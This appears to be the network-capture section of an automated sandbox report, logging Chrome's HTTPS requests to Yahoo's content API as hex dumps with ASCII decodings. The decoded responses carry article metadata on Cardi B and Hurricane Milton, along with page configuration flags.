                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              etag: W/"1d519-YgeF9MGZrxhExjibSWXZcLSgR2M"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 7b 22 69 74 65 6d 73 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 22 70 61 72 74 6e 65 72 44 61 74 61 22 3a 7b 22 61 64 4d 65 74 61 22 3a 7b 22 68 61 73 68 74 61 67 22 3a 22 6e 65 77 73 3b 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 22 2c 22 69 73 53 75 70 70 6c 79 53 65 67 6d 65 6e 74 22 3a 22 66 61 6c 73 65 22 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 55 53 22 2c 22 72 73 22 3a 22 6c 6d 73 69 64 3a 61 30 61 36 54 30 30 30 30 30 4d 4f 5a 78 6a 51 41 48 3b 72 65 76 73 70 3a 62 69 6c 6c 62 6f 61 72 64 5f 35 34 37 3b 6c 70 73 74 61 69 64 3a 35 33 63 35 33 62 32 39 2d 31 38 31 61 2d 33 36 31 30 2d 61 62 62 36 2d 37 33 34 32 64 37 61 63 31 34 31 36 3b 70 74 3a 63 6f 6e 74 65 6e 74 3b 70 64 3a 6d 6f 64 61 6c 3b 76 65 72 3a 6d 65 67 61 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;entertainment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000MOZxjQAH;revsp:billboard_547;lpstaid:53c53b29-181a-3610-abb6-7342d7ac1416;pt:content;pd:modal;ver:megas
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC338INData Raw: 36 31 38 31 35 33 39 22 2c 22 65 6e 74 69 74 69 65 73 22 3a 5b 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 50 6c 61 73 74 69 63 5f 73 75 72 67 65 72 79 22 2c 22 6c 61 62 65 6c 22 3a 22 70 6c 61 73 74 69 63 20 73 75 72 67 65 72 79 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 38 39 38 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 35 33 31 2c 22 65 6e 64 63 68 61 72 22 3a 35 34 35 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 74 69 74 6c 65 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 22 2c 22 6c 61 62 65 6c 22 3a 22 42 69 6c 6c 62 6f 61 72 64 22 2c 22 63 61 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6181539","entities":[{"term":"WIKIID:Plastic_surgery","label":"plastic surgery","capAbtScore":"0.898","metaData":[{"visible":"false"}],"startchar":531,"endchar":545,"specialParentTags":["title"],"instanceParentTags":[]},{"term":"","label":"Billboard","cap
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1072INData Raw: 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 61 22 2c 22 73 74 72 6f 6e 67 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 73 74 72 6f 6e 67 22 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 22 2c 22 6c 61 62 65 6c 22 3a 22 76 69 64 65 6f 20 63 61 75 73 65 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 38 34 37 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 31 35 31 38 2c 22 65 6e 64 63 68 61 72 22 3a 31 35 32 38 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 43 61 72 64 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: pecialParentTags":["a","strong"],"instanceParentTags":["strong"]},{"term":"","label":"video cause","capAbtScore":"0.847","metaData":[{"visible":"false"}],"startchar":1518,"endchar":1528,"specialParentTags":[],"instanceParentTags":[]},{"term":"WIKIID:Cardi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 6f 6e 74 65 6e 74 22 3a 66 61 6c 73 65 2c 22 69 73 50 65 72 73 6f 6e 61 6c 46 69 6e 61 6e 63 65 41 72 74 69 63 6c 65 22 3a 66 61 6c 73 65 2c 22 69 73 45 64 69 74 6f 72 69 61 6c 50 69 63 6b 73 4c 69 73 74 4f 76 65 72 72 69 64 64 65 6e 22 3a 66 61 6c 73 65 2c 22 69 73 53 70 6f 6e 73 6f 72 65 64 43 6f 6e 74 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6b 65 79 77 6f 72 64 73 22 3a 22 70 6c 61 73 74 69 63 20 73 75 72 67 65 72 79 2c 20 42 69 6c 6c 62 6f 61 72 64 2c 20 76 69 64 65 6f 20 63 61 75 73 65 2c 20 43 61 72 64 69 20 42 22 2c 22 6d 65 74 61 22 3a 7b 7d 2c 22 6d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 4d 6f 6e 2c 20 30 37 20 4f 63 74 20 32 30 32 34 20 31 37 3a 30 32 3a 34 36 20 47 4d 54 22 2c 22 70 61 67 65 54 69 74 6c 65 22 3a 22 43 61 72 64 69 20 42 20 53 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ontent":false,"isPersonalFinanceArticle":false,"isEditorialPicksListOverridden":false,"isSponsoredContent":false,"keywords":"plastic surgery, Billboard, video cause, Cardi B","meta":{},"modifiedDate":"Mon, 07 Oct 2024 17:02:46 GMT","pageTitle":"Cardi B Sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 68 6f 77 45 64 69 74 6f 72 69 61 6c 50 69 63 6b 73 50 6c 61 63 65 68 6f 6c 64 65 72 22 3a 66 61 6c 73 65 2c 22 73 6c 69 63 6b 54 68 75 6d 62 6e 61 69 6c 22 3a 7b 7d 2c 22 73 70 61 63 65 49 64 22 3a 22 31 31 39 37 37 39 32 34 34 36 22 2c 22 73 70 6f 6e 73 6f 72 65 64 43 6f 6e 74 65 6e 74 22 3a 66 61 6c 73 65 2c 22 73 75 6d 6d 61 72 79 22 3a 22 54 68 65 20 72 61 70 70 65 72 20 61 6c 73 6f 20 63 6c 61 72 69 66 69 65 64 20 73 68 65 20 77 61 73 20 77 65 61 72 69 6e 67 20 73 68 61 70 65 77 65 61 72 20 69 6e 20 61 20 72 65 63 65 6e 74 20 76 69 72 61 6c 20 76 69 64 65 6f 2e 22 2c 22 74 69 74 6c 65 22 3a 22 43 61 72 64 69 20 42 20 53 68 6f 77 73 20 4f 66 66 20 57 68 61 74 20 48 65 72 20 42 6f 64 79 20 e2 80 98 52 65 61 6c 6c 79 20 4c 6f 6f 6b 73 20 4c 69 6b 65 e2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: howEditorialPicksPlaceholder":false,"slickThumbnail":{},"spaceId":"1197792446","sponsoredContent":false,"summary":"The rapper also clarified she was wearing shapewear in a recent viral video.","title":"Cardi B Shows Off What Her Body Really Looks Like
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 65 6e 74 73 43 74 61 20 65 6e 61 62 6c 65 52 52 41 64 73 53 6c 6f 74 73 20 65 6e 61 62 6c 65 52 52 41 64 73 53 6c 6f 74 73 57 69 74 68 4a 41 43 20 6e 65 77 73 4d 6f 64 61 6c 20 65 6e 61 62 6c 65 56 69 65 77 43 6f 6d 6d 65 6e 74 73 43 54 41 5c 22 20 64 61 74 61 2d 61 73 73 65 74 73 3d 5b 5d 20 64 61 74 61 2d 64 65 76 69 63 65 3d 64 65 73 6b 74 6f 70 20 64 61 74 61 2d 69 31 38 6e 3d 27 7b 5c 22 7b 64 61 74 65 7d 20 61 74 20 7b 74 69 6d 65 7d 5c 22 3a 5c 22 7b 64 61 74 65 7d 20 61 74 20 7b 74 69 6d 65 7d 5c 22 2c 5c 22 7b 30 7d 20 68 72 20 61 67 6f 5c 22 3a 5c 22 7b 30 7d 20 68 72 20 61 67 6f 5c 22 2c 5c 22 7b 30 7d 20 6d 69 6e 20 61 67 6f 5c 22 3a 5c 22 7b 30 7d 20 6d 69 6e 20 61 67 6f 5c 22 2c 5c 22 7b 30 7d 20 6d 69 6e 73 20 61 67 6f 5c 22 3a 5c 22 7b 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: entsCta enableRRAdsSlots enableRRAdsSlotsWithJAC newsModal enableViewCommentsCTA\" data-assets=[] data-device=desktop data-i18n='{\"{date} at {time}\":\"{date} at {time}\",\"{0} hr ago\":\"{0} hr ago\",\"{0} min ago\":\"{0} min ago\",\"{0} mins ago\":\"{0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 53 74 69 63 6b 79 41 64 73 5c 22 3a 74 72 75 65 2c 5c 22 73 68 6f 77 43 6f 6d 6d 65 6e 74 73 49 63 6f 6e 49 6e 53 68 61 72 65 53 65 63 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 41 64 53 6c 6f 74 73 4e 65 77 4d 61 70 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 47 41 4d 41 64 73 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 47 41 4d 41 64 73 4f 6e 4c 6f 61 64 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 46 69 6e 61 6e 63 65 50 72 65 6d 69 75 6d 54 69 63 6b 65 72 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 41 64 4c 69 74 65 55 70 53 65 6c 6c 46 65 65 64 62 61 63 6b 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 52 52 41 74 54 6f 70 5c 22 3a 74 72 75 65 2c 5c 22 65 6e 61 62 6c 65 43 6f 6d 6d 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ":true,\"enableStickyAds\":true,\"showCommentsIconInShareSec\":true,\"enableAdSlotsNewMap\":true,\"enableGAMAds\":true,\"enableGAMAdsOnLoad\":true,\"enableFinancePremiumTicker\":true,\"enableAdLiteUpSellFeedback\":true,\"enableRRAtTop\":true,\"enableComme
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 2c 5c 22 68 6f 75 72 43 79 63 6c 65 5c 22 3a 5c 22 68 31 32 5c 22 2c 5c 22 6d 69 6e 75 74 65 5c 22 3a 5c 22 32 2d 64 69 67 69 74 5c 22 2c 5c 22 6d 6f 6e 74 68 5c 22 3a 5c 22 6c 6f 6e 67 5c 22 2c 5c 22 79 65 61 72 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 2c 5c 22 74 69 6d 65 5a 6f 6e 65 4e 61 6d 65 5c 22 3a 5c 22 73 68 6f 72 74 5c 22 7d 2c 5c 22 70 6f 73 74 44 61 74 65 53 68 6f 72 74 46 6f 72 6d 5c 22 3a 7b 5c 22 68 6f 75 72 5c 22 3a 5c 22 6e 75 6d 65 72 69 63 5c 22 2c 5c 22 68 6f 75 72 43 79 63 6c 65 5c 22 3a 5c 22 68 31 32 5c 22 2c 5c 22 6d 69 6e 75 74 65 5c 22 3a 5c 22 32 2d 64 69 67 69 74 5c 22 2c 5c 22 74 69 6d 65 5a 6f 6e 65 4e 61 6d 65 5c 22 3a 5c 22 73 68 6f 72 74 5c 22 7d 7d 5c 6e 20 20 20 20 3c 2f 73 63 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ":\"numeric\",\"hourCycle\":\"h12\",\"minute\":\"2-digit\",\"month\":\"long\",\"year\":\"numeric\",\"timeZoneName\":\"short\"},\"postDateShortForm\":{\"hour\":\"numeric\",\"hourCycle\":\"h12\",\"minute\":\"2-digit\",\"timeZoneName\":\"short\"}}\n </scr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 65 6c 6d 3a 6c 6f 67 6f 3b 73 6c 6b 3a 42 69 6c 6c 62 6f 61 72 64 3b 69 74 63 3a 30 3b 67 3a 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 63 61 61 73 2d 69 6d 67 20 61 6c 74 3d 42 69 6c 6c 62 6f 61 72 64 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 6e 79 2f 61 70 69 2f 72 65 73 2f 31 2e 32 2f 74 54 45 54 47 57 36 70 69 77 7a 39 64 4b 4b 43 37 4b 49 4e 65 77 2d 2d 2f 59 58 42 77 61 57 51 39 61 47 6c 6e 61 47 78 68 62 6d 52 6c 63 6a 74 33 50 54 45 33 4e 6a 74 6f 50 54 59 77 2f 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 6f 73 2f 63 72 65 61 74 72 2d 75 70 6c 6f 61 64 65 64 2d 69 6d 61 67 65 73 2f 32 30 32 32 2d 30 33 2f 30 66 61 63 34 36 66 30 2d 61 63 38 31 2d 31 31 65 63 2d 39 66 66 65 2d 65 66 66 37 31 65 62 61 33 39 61 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: elm:logo;slk:Billboard;itc:0;g:><img class=caas-img alt=Billboard src=https://s.yimg.com/ny/api/res/1.2/tTETGW6piwz9dKKC7KINew--/YXBwaWQ9aGlnaGxhbmRlcjt3PTE3NjtoPTYw/https://s.yimg.com/os/creatr-uploaded-images/2022-03/0fac46f0-ac81-11ec-9ffe-eff71eba39af


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              111192.168.2.45113487.248.119.2524431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1666OUTGET /caas/content/article/?uuid=763792a6-0264-4c09-8fdc-ad4e3aa042d8,bd87c24a-8c34-4ec0-a681-3564c02d7778,d965fa24-e6a0-3c55-8290-0262978e7d08,7b47460a-662a-3fa6-bc8a-19c327c6fce9,3eb87d51-a7f4-304f-a28c-91350aafdafa,c800f6b2-23f8-4294-bb16-2fcd31dd05bf,a574dfca-1c8e-3952-b021-11a2a439b3b7,7e3e7364-c32b-3510-b0fe-64f202383852,9edb1ffc-4d2e-3ef7-ad6e-b96ef1549f9d,99ea0d11-6a27-33c8-b25a-19733882bdc0&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC639INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-methods: GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-length: 824854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              etag: W/"c9616-RZorPl7RH4m95dElxGT+TthnFZ8"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1174INData Raw: 7b 22 69 74 65 6d 73 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 22 70 61 72 74 6e 65 72 44 61 74 61 22 3a 7b 22 61 64 4d 65 74 61 22 3a 7b 22 68 61 73 68 74 61 67 22 3a 22 6e 65 77 73 3b 74 72 65 6e 64 69 6e 67 3b 74 72 65 6e 64 69 6e 67 2d 6e 65 77 73 3b 75 70 64 61 74 65 2d 6d 65 3b 77 65 61 74 68 65 72 3b 6e 61 74 75 72 61 6c 70 68 65 6e 6f 6d 65 6e 61 3b 6e 61 74 75 72 65 61 6e 64 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 22 69 73 53 75 70 70 6c 79 53 65 67 6d 65 6e 74 22 3a 22 66 61 6c 73 65 22 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 55 53 22 2c 22 72 73 22 3a 22 6c 6d 73 69 64 3a 61 30 37 37 30 30 30 30 30 30 43 46 6f 47 79 41 41 4c 3b 72 65 76 73 70 3a 59 61 68 6f 6f 21 20 4e 65 77 73 3b 6c 70 73 74 61 69 64 3a 37 36 33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;trending;trending-news;update-me;weather;naturalphenomena;natureandenvironment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a077000000CFoGyAAL;revsp:Yahoo! News;lpstaid:763
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 6f 72 69 64 61 73 2d 67 75 6c 66 2d 63 6f 61 73 74 2d 6d 61 73 73 69 76 65 2d 65 76 61 63 75 61 74 69 6f 6e 73 2d 6f 72 64 65 72 65 64 2d 31 36 30 31 32 30 39 33 34 22 2c 22 63 61 6e 6f 6e 69 63 61 6c 53 69 74 65 22 3a 22 6e 65 77 73 22 2c 22 63 61 6e 6f 6e 69 63 61 6c 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 6e 65 77 73 2f 68 75 72 72 69 63 61 6e 65 2d 6d 69 6c 74 6f 6e 2d 74 72 61 63 6b 65 72 2d 63 61 74 65 67 6f 72 79 2d 34 2d 73 74 6f 72 6d 2d 68 65 61 64 73 2d 74 6f 77 61 72 64 2d 66 6c 6f 72 69 64 61 73 2d 67 75 6c 66 2d 63 6f 61 73 74 2d 6d 61 73 73 69 76 65 2d 65 76 61 63 75 61 74 69 6f 6e 73 2d 6f 72 64 65 72 65 64 2d 31 36 30 31 32 30 39 33 34 2e 68 74 6d 6c 22 2c 22 63 61 74 65 67 6f 72 79 4c 61 62 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: oridas-gulf-coast-massive-evacuations-ordered-160120934","canonicalSite":"news","canonicalUrl":"https://www.yahoo.com/news/hurricane-milton-tracker-category-4-storm-heads-toward-floridas-gulf-coast-massive-evacuations-ordered-160120934.html","categoryLabe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC196INData Raw: 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 53 61 66 66 69 72 25 65 32 25 38 30 25 39 33 53 69 6d 70 73 6f 6e 5f 73 63 61 6c 65 22 2c 22 6c 61 62 65 6c 22 3a 22 43 61 74 65 67 6f 72 79 20 35 20 73 74 6f 72 6d 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 39 30 32 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 38 36 34 2c 22 65 6e 64 63 68 61 72 22 3a 38 37 39 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 61 22 2c 22 74 69 74 6c 65 22 5d 2c 22 69 6e 73 74 61 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: erm":"WIKIID:Saffir%e2%80%93Simpson_scale","label":"Category 5 storm","capAbtScore":"0.902","metaData":[{"visible":"false"}],"startchar":864,"endchar":879,"specialParentTags":["a","title"],"instan
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 5d 7d 2c 7b 22 74 65 72 6d 22 3a 22 57 49 4b 49 49 44 3a 4a 6f 68 6e 5f 4d 69 6c 74 6f 6e 22 2c 22 6c 61 62 65 6c 22 3a 22 4d 69 6c 74 6f 6e 22 2c 22 63 61 70 41 62 74 53 63 6f 72 65 22 3a 22 30 2e 38 37 31 22 2c 22 6d 65 74 61 44 61 74 61 22 3a 5b 7b 22 76 69 73 69 62 6c 65 22 3a 22 66 61 6c 73 65 22 7d 5d 2c 22 73 74 61 72 74 63 68 61 72 22 3a 34 38 39 2c 22 65 6e 64 63 68 61 72 22 3a 34 39 34 2c 22 73 70 65 63 69 61 6c 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 61 22 2c 22 73 74 72 6f 6e 67 22 2c 22 68 32 22 2c 22 74 69 74 6c 65 22 2c 22 66 69 67 63 61 70 74 69 6f 6e 22 5d 2c 22 69 6e 73 74 61 6e 63 65 50 61 72 65 6e 74 54 61 67 73 22 3a 5b 22 66 69 67 63 61 70 74 69 6f 6e 22 5d 7d 2c 7b 22 74 65 72 6d 22 3a
